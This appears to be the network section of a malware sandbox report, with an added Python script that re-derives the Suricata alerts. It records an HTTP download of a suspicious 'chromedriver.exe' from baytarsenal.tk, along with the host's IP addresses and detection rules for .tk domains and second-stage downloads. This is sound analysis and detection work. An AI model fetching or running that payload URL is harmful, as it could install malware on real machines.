Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
baytarsenal.tk | 145.14.144.63 | |
- TCP Requests

GET 200 http://baytarsenal.tk/ccdriver/chromedriver.exe

Request:

```http
GET /ccdriver/chromedriver.exe HTTP/1.1
Host: baytarsenal.tk
Connection: Keep-Alive
```

Response headers:

```http
HTTP/1.1 200 OK
Date: Wed, 11 Aug 2021 08:52:38 GMT
Content-Type: application/octet-stream
Content-Length: 11107328
Connection: keep-alive
Last-Modified: Tue, 08 Jun 2021 11:07:12 GMT
Accept-Ranges: bytes
Server: awex
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Request-ID: bb329bd23b9d1f3cc12460ca300b32d7
```

Body: not shown.
ICMP traffic
No ICMP traffic performed.
IRC traffic
Command | Params | Type |
---|---|---|
CONNECT | %s HTTP/1.1 | client |

CONNECT is also a valid IRC server-link command, which is why the IRC parser recorded this line, but the parameters `%s HTTP/1.1` are an HTTP request-line template with an unfilled printf-style placeholder. Treat this entry as the parser matching the CONNECT verb in an HTTP (proxy) request, not as evidence of IRC traffic.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
UDP 192.168.56.102:52336 -> 8.8.8.8:53 | 2012811 | ET DNS Query to a .tk domain - Likely Hostile | Potentially Bad Traffic |
UDP 192.168.56.102:52336 -> 164.124.101.2:53 | 2012811 | ET DNS Query to a .tk domain - Likely Hostile | Potentially Bad Traffic |
TCP 192.168.56.102:49165 -> 145.14.144.92:80 | 2012810 | ET POLICY HTTP Request to a *.tk domain | Potentially Bad Traffic |
TCP 192.168.56.102:49165 -> 145.14.144.92:80 | 2031094 | ET HUNTING Request to .TK Domain with Minimal Headers | Potentially Bad Traffic |
TCP 145.14.144.92:80 -> 192.168.56.102:49165 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
TCP 145.14.144.92:80 -> 192.168.56.102:49165 | 2016538 | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | Potentially Bad Traffic |
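The four Suricata hits on the HTTP flow all derive from facts visible in the captured exchange: a `.tk` host, a client that sends only `Host` and `Connection` (no `User-Agent`, no `Accept`), and a 200 response serving an `.exe` as `application/octet-stream`. The script below re-derives those verdicts from the request and response shown in the TCP Requests section, and adds the body check the page does not include (an `MZ`/`PE\0\0` header test). It is an added example written for this page, not Suricata's rule logic or anything from the sandbox report; the header strings are copied from the report above, while `SAMPLE_PE_HEAD` is a constructed stand-in for a body the page does not show. Note also that the DNS answer recorded above is 145.14.144.63 while the TCP flows in the alert table went to 145.14.144.92; both sit in the same /24, and the report does not say why they differ.

```python
"""Added example (not from the original report): re-derive the ET alert
heuristics from the captured HTTP exchange, and check a body for a PE header."""
from typing import Dict, List, Tuple

# Request and response headers exactly as shown in the report above.
REQUEST = (
    "GET /ccdriver/chromedriver.exe HTTP/1.1\r\n"
    "Host: baytarsenal.tk\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
)
RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Wed, 11 Aug 2021 08:52:38 GMT\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Length: 11107328\r\n"
    "Connection: keep-alive\r\n"
    "Last-Modified: Tue, 08 Jun 2021 11:07:12 GMT\r\n"
    "Accept-Ranges: bytes\r\n"
    "Server: awex\r\n"
    "X-Xss-Protection: 1; mode=block\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "X-Request-ID: bb329bd23b9d1f3cc12460ca300b32d7\r\n"
    "\r\n"
)

# TLDs treated as hostile (the ET rules above key on .tk); extend per local policy.
HOSTILE_TLDS = {"tk"}
# A browser or updater always sends these; their absence is the "minimal headers"
# heuristic behind SIDs 2031094 and 2016538.
EXPECTED_CLIENT_HEADERS = {"user-agent", "accept"}
EXE_CONTENT_TYPES = {"application/octet-stream", "application/x-msdownload",
                     "application/x-dosexec"}


def parse_http(raw: str) -> Tuple[str, Dict[str, str]]:
    """Split an HTTP head into (start line, lower-cased header dict); body is ignored."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def classify(request: str, response: str) -> List[str]:
    """Return the list of findings the exchange triggers (empty list = nothing notable)."""
    req_line, req_hdrs = parse_http(request)
    status_line, resp_hdrs = parse_http(response)
    method, uri, _version = req_line.split(" ", 2)
    status = status_line.split(" ")[1]
    host = req_hdrs.get("host", "").rsplit(":", 1)[0].lower()
    findings: List[str] = []

    tld = host.rsplit(".", 1)[-1]
    if tld in HOSTILE_TLDS:
        findings.append(f"request to .{tld} domain ({host})")

    missing = sorted(EXPECTED_CLIENT_HEADERS - set(req_hdrs))
    if missing:
        findings.append("minimal client headers (missing " + ", ".join(missing) + ")")

    ctype = resp_hdrs.get("content-type", "").split(";")[0].strip().lower()
    is_exe = ctype in EXE_CONTENT_TYPES or uri.lower().endswith((".exe", ".dll"))
    if is_exe and status == "200":
        size = resp_hdrs.get("content-length", "?")
        findings.append(f"PE download over HTTP ({method} {uri}, {ctype}, {size} bytes)")
    if is_exe and missing:
        findings.append("executable retrieved with minimal headers: possible second-stage download")
    return findings


def looks_like_pe(data: bytes) -> bool:
    """True if data starts with an MZ stub whose e_lfanew points at 'PE\\0\\0' inside the buffer."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


# Constructed stand-in for the first bytes of the response body, which the report does not show:
# MZ stub, e_lfanew = 0x40, then the PE signature.
SAMPLE_PE_HEAD = b"MZ" + b"\0" * 0x3A + (0x40).to_bytes(4, "little") + b"PE\0\0"

if __name__ == "__main__":
    for finding in classify(REQUEST, RESPONSE):
        print("-", finding)
    print("body looks like PE:", looks_like_pe(SAMPLE_PE_HEAD))
```

Run as-is to see the four findings that correspond to SIDs 2012810, 2031094, 2018959 and 2016538; feed `looks_like_pe` the first 64+ bytes of a real capture's body to confirm the content-type was honest, since an `application/octet-stream` label alone proves nothing about what was served.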
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts